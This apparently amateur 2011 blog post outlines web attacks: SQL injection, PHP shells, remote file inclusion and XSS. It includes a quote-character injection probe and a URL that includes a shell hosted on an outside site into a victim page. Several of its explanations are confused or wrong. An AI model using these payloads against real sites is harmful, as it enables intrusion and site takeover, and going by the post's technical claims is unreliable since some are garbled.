Wednesday, January 19, 2011

Web Based Hacking

 After discussing the email based, now we find out how and what types of tools are used by hackers to take the services of the web server, which are more secure than the others. Following are the some attacks and tolls which are mostly used.
        i.            SQL Injection
      ii.            Shells
    iii.            RFI
     iv.            XSS
Let us discuss these attacks in detail;

SQL Injection:
Now-a-days mostly web servers are connected with the SQL servers, so  when user enter the username and password, that information is matched on the actual server, if the username and password are correct then user can login otherwise not. So passwords are stored in the encrypted method, we are not here decrypting the password just we are trying to change the command instructions on the command.
If u really want to check your website is under protection or not, or is vulnerable to RFI attach.
If your site's URL is:
Code
Yoursite.com/index.php?id=545
just add a ' like this at the end
Code:
Yoursite.com/index.php?id=545’

Shells:
Dot PHP is the advance programming language which is used to create the more secure software and wed servers. Shell is also a malicious .php scripts it is used with Shell of the operating system. Once the hacker become successful after authentication, hacker can rename, edit, download/upload the file according to the situation and requirements. Deface is another name of the shells.

RFI:
RFI is used with shell in the programming language. It is used to spoil the operating system. If u want to upload your shell........ use the following commands and understand:
Code:
Yoursite.com/shell.txt
and you found a vulnerable site to RFI... then you can do as follow:
Code
Victimsite.com/index.php?page=yousite.com/shell.txt

XSS:
It is called the Cross site scripting, in actual it is a computer security vulnerability which has found in the web server applications. Web pages are written in the HTML Hypertext Markup Language. So everybody knows the html programming language because it is very simple and easy to understand. If a hacker find the code of any web page then they can change the code with the malicious script into the content. The types of XSS are the Non-persistent, persistent, traditional etc.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)